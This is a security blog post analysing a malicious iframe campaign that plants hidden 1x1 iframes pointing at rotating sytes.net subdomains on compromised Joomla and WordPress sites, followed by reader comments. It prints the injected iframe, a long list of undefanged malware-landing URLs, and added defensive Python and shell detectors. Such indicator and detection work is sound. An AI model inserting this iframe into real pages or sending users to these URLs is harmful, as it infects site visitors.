Malware iFrame Campaign from Sytes(.)net

For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that injects iframes pointing at random subdomains of sytes(.)net into compromised sites.

Malicious iframe injection is nothing new, and attackers have been abusing no-ip.org dynamic-DNS domains for a long time (sytes.net is another of No-IP's free domains). What is catching our attention here is how often these hostnames change and how short a life-span each one has.

This is the payload being added to the compromised sites (the URL is defanged with "httX" and extra spaces; the live injection has neither):

<iframe src="httX:// krbnomrhp.sytes.net:12601 /cart/manuallogin/linktous.php?guardian=82" 
    width=1 height=1 style="visibility: hidden"></iframe>

As you can see, it is a normal hidden 1x1 iframe injection. But that hostname goes offline after approximately 30 minutes and is replaced by a new one. Here is the list we compiled over the past 24 hours; the leading number is how many times we saw each URL:

     40 http://snbkjmv.sytes.net:9101/htbin/clickheat/virus.php?spamnav=82"
     35 http://rvpyhfkjrf.sytes.net:9101/url/uploads/virus.php?spamnav=82"
     34 http://yhmpzoav.sytes.net:9101/mchat/descs/temp_order/punknown.php?power=82"
     30 http://yerepkhayq.sytes.net:9101/vmailadmin/proxy/wp-admin/virus.php?spamnav=82"
     30 http://knkkmprda.sytes.net:9101/dbadmin/virus.php?spamnav=82"
     28 http://nmmmdbhh.sytes.net:12601/mysql/gentoo.php?deals=82"
     27 http://sumghmrs.sytes.net:9101/classes/temp_order/components/virus.php?spamnav=82"
     27 http://lvvfafoylf.sytes.net:9101/srv/virus.php?spamnav=82"
     26 http://rvpyhfkjrf.sytes.net:9101/t/virus.php?spamnav=82"
     26 http://ndcdkba.sytes.net:9101/ip/search/stonemanor/punknown.php?power=82"
     24 http://sgkiipjali.sytes.net:12601/archive/administr8/admin4_colon/gentoo.php?deals=82"
     24 http://nmmmdbhh.sytes.net:12601/phpldapadmin/phpsysinfo/photos/gentoo.php?deals=82"
     24 http://mpuizserdk.sytes.net:9101/skins/virus.php?spamnav=82"
     23 http://zzaisucp.sytes.net:9101/cadmins/adm/options/virus.php?spamnav=82"
     23 http://vzfxlctk.sytes.net:9101/bitmaps/competition/download/virus.php?spamnav=82"
     23 http://hmbgmijz.sytes.net:9101/video/cgi-perl/tag/outdoors.php?cert=82"
     22 http://xpvcrpf.sytes.net:9101/log_order/punknown.php?power=82"
     22 http://xivzwmojg.sytes.net:9101/admin_includes/config/public/virus.php?spamnav=82"
     22 http://sgkiipjali.sytes.net:12601/roman/gentoo.php?deals=82"
     22 http://knkkmprda.sytes.net:9101/command/virus.php?spamnav=82"
     22 http://kahfcjkg.sytes.net:12601/project/event.php?technical=82"
     22 http://iuxvbhxrp.sytes.net:9101/logo_sysadmin/dev/buy/punknown.php?powe
     22 http://hjzdenbi.sytes.net:9101/cpanel_file/film.php?photos=82"
     21 http://sumghmrs.sytes.net:9101/c0de/virus.php?spamnav=82"
     21 http://irpuxtox.sytes.net:9101/class/bitmaps/virus.php?spamnav=82"
     20 http://vtummjhpb.sytes.net:9101/source/outdoors.php?cert=82"
     20 http://ntygkznp.sytes.net:9101/examples/system-administration/admin_files/outdoors.php?cert=82"
     20 http://nswdmekq.sytes.net:9101/full/sec/virus.php?spamnav=82"
     20 http://ngoydafv.sytes.net:12601/picture_library/htm/gentoo.php?deals=82"
     20 http://mnzzgocsjh.sytes.net:9101/tmp/engine/virus.php?spamnav=82"
     20 http://mnwpkrqbu.sytes.net:12601/admin4_colon/gentoo.php?deals=82"
     20 http://lzrbccmyh.sytes.net:9101/support/outdoors.php?cert=82"
     20 http://knkkmprda.sytes.net:9101/administrators/options/virus.php?spamnav=82"
     20 http://idbosrxgg.sytes.net:9101/session/virus.php?spamnav=82"
     20 http://fgsbmtad.sytes.net:9101/2007/daily/virus.php?spamnav=82"
     20 http://eljbpjfwg.sytes.net:9101/advanced/punknown.php?power=82"
     20 http://dphtmdd.sytes.net:9101/feed/javascript/sql/virus.php?spamnav=82"
     19 http://vxvyvrf.sytes.net:9101/mysql/film.php?photos=82"
     19 http://ukmwzaum.sytes.net:9101/report/tmp/imode/virus.php?spamnav=82"
     19 http://ngoydafv.sytes.net:12601/titles/Lotus_Domino_Admin/maps/gentoo.php?deals=82"
     19 http://fiwailsko.sytes.net:9101/sshadmin/punknown.php?power=82"
     19 http://fgsbmtad.sytes.net:9101/daemon/virus.php?spamnav=82"
     18 http://zwwskaudp.sytes.net:9101/sshadmin/admin1/post/virus.php?spamnav=82"
     18 http://xlsymepe.sytes.net:9101/2003/punknown.php?power=82"
     18 http://ngoydafv.sytes.net:12601/wp-content/nwshp/conf/gentoo.php?deals=82"
     18 http://iljdfdiap.sytes.net:9101/bad/virus.php?spamnav=82"
     18 http://etaggovaql.sytes.net:9101/am/2006/special/punknown.php?power=82"
     18 http://bxluzpbq.sytes.net:9101/profile/wm/feedback/film.php?photos=82"
     17 http://yerepkhayq.sytes.net:9101/finance/virus.php?spamnav=82"
     17 http://vzfxlctk.sytes.net:9101/cpanel_file/zip/virus.php?spamnav=82"
     17 http://ukmwzaum.sytes.net:9101/adm2/virus.php?spamnav=82"
     17 http://mmqozpxrm.sytes.net:9101/haddan_files/punknown.php?power=82"
     17 http://kyicikarpu.sytes.net:9101/results/pm/screens/virus.php?spamnav=82"
     17 http://knhvdmsi.sytes.net:9101/pm/punknown.php?power=82"
     17 http://fowkvsqt.sytes.net:9101/money/admin/virus.php?spamnav=82"
     17 http://fkzsjei.sytes.net:9101/add/virus.php?spamnav=82"
     16 http://zwpcoxs.sytes.net:9101/server_admin_small/elements/film.php?photos=82"
     16 http://vzfxlctk.sytes.net:9101/useradmin/virus.php?spamnav=82"
     16 http://snbkjmv.sytes.net:9101/bbadmin/alterra/virus.php?spamnav=82"
     16 http://ovdqypgi.sytes.net:12601/relax/gentoo.php?deals=82"
     16 http://ovdqypgi.sytes.net:12601/2010/gentoo.php?deals=82"
     15 http://qrzugjjrw.sytes.net:9101/oplata/order/virus.php?spamnav=82"
     15 http://ozqsveikb.sytes.net:9101/avi/virus.php?spamnav=82"
     15 http://nnlwlvq.sytes.net:9101/article/downloads/include/virus.php?spamnav=82"
     15 http://knkkmprda.sytes.net:9101/banneradmin/virus.php?spamnav=82"
     15 http://enwebkwh.sytes.net:9101/product/virus.php?spamnav=82"
     15 http://coqptizgt.sytes.net:9101/data/outdoors.php?cert=82"
     15 http://axfhttqnl.sytes.net:9101/node/virus.php?spamnav=82"
     14 http://xglpjtlpbl.sytes.net:9101/help/outdoors.php?cert=82"
     14 http://xdxmziges.sytes.net:9101/tools/xyza/outdoors.php?cert=82"
     14 http://wwcrkkiu.sytes.net:9101/sshadmin/down/outdoors.php?cert=82"
     14 http://pkpmezztj.sytes.net:9101/beta/sbot/film.php?photos=82"
     14 http://owtppqzjh.sytes.net:9101/internal/proxy/autologin/film.php?photos=82"
     14 http://oggnxbyjwi.sytes.net:9101/backup/e107_handlers/partner/film.php?photos=82"
     14 http://oexwfsnp.sytes.net:9101/php/xfile/directadmin/virus.php?spamnav=82"
     14 http://oexwfsnp.sytes.net:9101/language/ccp14admin/style/virus.php?spamnav=82"
     14 http://nifhevj.sytes.net:9101/cache/sshadmin/inc/outdoors.php?cert=82"
     14 http://mpuizserdk.sytes.net:9101/page/author/misc/virus.php?spamnav=82"
     14 http://mkqydbik.sytes.net:9101/pass/outdoors.php?cert=82"
     14 http://lkgzbafam.sytes.net:9101/installation/outdoors.php?cert=82"
     14 http://lhruanxu.sytes.net:9101/software/virus.php?spamnav=82"
     14 http://kzaefdyx.sytes.net:9101/system/pic/nwshp/punknown.php?power=82"
     14 http://kzaefdyx.sytes.net:9101/admin4_account/punknown.php?power=82"
     14 http://kyicikarpu.sytes.net:9101/commercial/virus.php?spamnav=82"
     14 http://kdkudocdcj.sytes.net:9101/data/content/toolz/punknown.php?power=82"
     14 http://hjzdenbi.sytes.net:9101/ip/extras/null/film.php?photos=82"
     14 http://fiwailsko.sytes.net:9101/mysql_admin/punknown.php?power=82"
     14 http://cdjbdwcnb.sytes.net:9101/sysadmin/money/counters/virus.php?spamnav=82"
     14 http://augtohpklj.sytes.net:9101/plugins/user/house/virus.php?spamnav=82"
     14 http://anxytxwf.sytes.net:9101/addnews/punknown.php?power=82"
     13 http://zrsbhxi.sytes.net:9101/titles/cpanel/themes/virus.php?spamnav=82"
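
The list above is only useful if you look past the hostnames, which rotate every half hour. As an added example (this is not code from the post or from Sucuri), the following Python parses a subset of the list in the post's own "count URL" format, drops any non-campaign line that a grep for "http://" will also pick up (the constructed sample includes one W3C DTD reference for that purpose), weights each host, port, script name and query parameter by its count, and then builds a detector from the features that stay constant: the sytes.net parent domain, ports 9101 and 12601, a PHP script and a single "<word>=82" parameter. The detector assumes the live injection is written without the defanging spaces shown in the post.

```python
"""Added example; this is not code from the Sucuri post.

Parse a subset of the URL list above, separate the parts that rotate (the
hostnames) from the parts that do not (parent domain, port, script name, the
"<word>=82" query string), and build a detector from the stable parts.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a subset of the URLs in the post, in the post's own
# "<count> <url>" format, plus one non-campaign line of the kind a grep for
# "http://" also picks up.
SAMPLE_LIST = """\
     40 http://snbkjmv.sytes.net:9101/htbin/clickheat/virus.php?spamnav=82"
     35 http://rvpyhfkjrf.sytes.net:9101/url/uploads/virus.php?spamnav=82"
     34 http://yhmpzoav.sytes.net:9101/mchat/descs/temp_order/punknown.php?power=82"
     28 http://nmmmdbhh.sytes.net:12601/mysql/gentoo.php?deals=82"
     26 http://rvpyhfkjrf.sytes.net:9101/t/virus.php?spamnav=82"
     23 http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"
     23 http://hmbgmijz.sytes.net:9101/video/cgi-perl/tag/outdoors.php?cert=82"
     22 http://kahfcjkg.sytes.net:12601/project/event.php?technical=82"
     22 http://hjzdenbi.sytes.net:9101/cpanel_file/film.php?photos=82"
"""

# "<count> <url>" with the stray trailing quote the grep output carries.
LINE_RE = re.compile(r'^\s*(\d+)\s+(\S+?)"?\s*$')


def parse_list(text):
    """Return [(count, url), ...] for every line in the post's list format."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2)))
    return rows


def campaign_urls(rows):
    """Keep only URLs whose host is a sytes.net subdomain; drops grep noise."""
    keep = []
    for count, url in rows:
        host = urlsplit(url).hostname or ""
        if host.endswith(".sytes.net"):
            keep.append((count, url))
    return keep


def feature_summary(rows):
    """Weight each host, port, script name and (param, value) by its count."""
    hosts, ports, scripts, params = Counter(), Counter(), Counter(), Counter()
    for count, url in rows:
        parts = urlsplit(url)
        hosts[parts.hostname] += count
        ports[parts.port] += count
        scripts[parts.path.rsplit("/", 1)[-1]] += count
        for key, values in parse_qs(parts.query).items():
            for value in values:
                params[(key, value)] += count
    return {"hosts": hosts, "ports": ports, "scripts": scripts, "params": params}


# Detector built on the stable features only. The post shows the src defanged
# with spaces and "httX"; live injections have neither, and that is what this
# matches. The hostname is deliberately a wildcard.
INJECT_RE = re.compile(
    r'<iframe\b[^>]*\bsrc\s*=\s*["\']?'
    r'(https?://[a-z0-9-]+\.sytes\.net:(?:9101|12601)/[^"\'\s>]*?\.php\?[a-z]+=82)',
    re.IGNORECASE,
)


def find_injected_iframes(html):
    """Return the src of every iframe in `html` matching the campaign pattern."""
    return INJECT_RE.findall(html)


if __name__ == "__main__":
    summary = feature_summary(campaign_urls(parse_list(SAMPLE_LIST)))
    print("hosts  :", len(summary["hosts"]), "distinct")
    print("ports  :", dict(summary["ports"]))
    print("scripts:", dict(summary["scripts"]))
    print("params :", dict(summary["params"]))
    page = ('<iframe src="http://krbnomrhp.sytes.net:12601/cart/manuallogin/'
            'linktous.php?guardian=82" width=1 height=1 style="visibility: hidden">'
            '</iframe>')
    print("hits   :", find_injected_iframes(page))
```

Run over the sample, every host is distinct while the ports, script names and the "=82" value repeat, which is why a hostname blocklist is useless against this campaign and a pattern on the stable parts is not.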

How are the sites getting compromised?

This is a question we often get, but unfortunately we do not have access to most of the sites we monitor or query externally, so we cannot pinpoint the exact vector of the initial compromise.

What we do know is that most of the affected sites are running outdated versions of Joomla or WordPress, so an unpatched CMS is the most likely entry point.

While we cannot say exactly how it is happening, sites behind our CloudProxy product have not experienced any issues, as it protects against attacks of this kind.
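
As an added host-side check (this is not code from the post or from Sucuri), the following POSIX shell script walks a web root, prints every PHP/HTML/JS file carrying the sytes.net iframe, and reports the installed WordPress or Joomla version so it can be compared with the current release. The version-file locations and constant names are assumptions from memory of those releases, not something the post states.

```shell
#!/bin/sh
# Added example, not from the Sucuri post: triage a web root for the sytes.net
# iframe injection and report the CMS version, so it can be compared against
# the current WordPress or Joomla release. POSIX sh, find, grep and cut only.
#
# Usage: sh triage.sh /var/www/html

# The injected iframe, with the defanging spaces of the post removed: any
# sytes.net host, one of the two ports seen in the campaign, a path ending in
# a PHP script whose single parameter is set to 82.
INJECT_RE="<iframe[^>]*src=[\"']?https?://[a-z0-9.-]+\\.sytes\\.net:(9101|12601)/[^\"' >]*=82"

# Print the path of every web file under the given root that carries the
# iframe. One grep per file keeps find's exit status at 0 even when nothing
# matches, so the function is safe under "set -e".
find_injected_files() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.js' \) \
        -exec grep -qiE "$INJECT_RE" {} \; -print
}

# Print "<cms> <version>" for the root, or "unknown". The file locations and
# constant names are assumptions from memory of WordPress (wp-includes/version.php,
# $wp_version) and Joomla 1.5-1.7 / 2.5-3.x (libraries/joomla/version.php or
# libraries/cms/version/version.php, RELEASE and DEV_LEVEL); the post does not
# state them.
cms_version() {
    root="$1"
    if [ -f "$root/wp-includes/version.php" ]; then
        v=$(grep '^\$wp_version' "$root/wp-includes/version.php" | head -n 1 | cut -d"'" -f2)
        echo "wordpress $v"
        return 0
    fi
    for f in "$root/libraries/cms/version/version.php" "$root/libraries/joomla/version.php"; do
        if [ -f "$f" ]; then
            rel=$(grep -E "RELEASE *= *'" "$f" | head -n 1 | cut -d"'" -f2)
            dev=$(grep -E "DEV_LEVEL *= *'" "$f" | head -n 1 | cut -d"'" -f2)
            echo "joomla $rel.$dev"
            return 0
        fi
    done
    echo "unknown"
}

# Run only when a web root is given on the command line.
if [ $# -gt 0 ]; then
    echo "CMS: $(cms_version "$1")"
    echo "Files carrying the sytes.net iframe:"
    find_injected_files "$1"
fi
```

Any file this prints is a file an attacker has written to, so the version check matters less than the fact that the whole install should be treated as compromised: compare every core file against a clean copy of the same release rather than just deleting the iframe line.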

About Daniel Cid

Daniel B. Cid is the CTO & Founder of Sucuri and the founder of the open source OSSEC HIDS. His interests range from intrusion detection and log analysis (log-based intrusion detection) to web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid

  • http://www.jugarjugar.net/ Jugar Jugar

    The website it is essential to build a good firewall and security information is inevitable. Recently, malware has invaded from your web server to the user, this really makes us confused to worry about the safety of our lap top and another line

  • http://www.parafriv.net/ Para Friv

    Still do not understand about this content, really thank you for sharing information.

  • Kjetil

    These are all landing pages related to Sweet Orange exploit kit.

  • pyby

    Nasty malware, I'm working on it. It uses EXIF in JPEGs to execute malware!

    check my blog: http://www.vsx.pl/malware-php-iframe-powiazany-z-sytes-net-cookie-dsgfdg34g-htaccess-zmieniony/

  • vtedesco

    If that can help you: I have found the malware code in a Joomla website in the file “/libraries/joomla/factory.php” (line 15)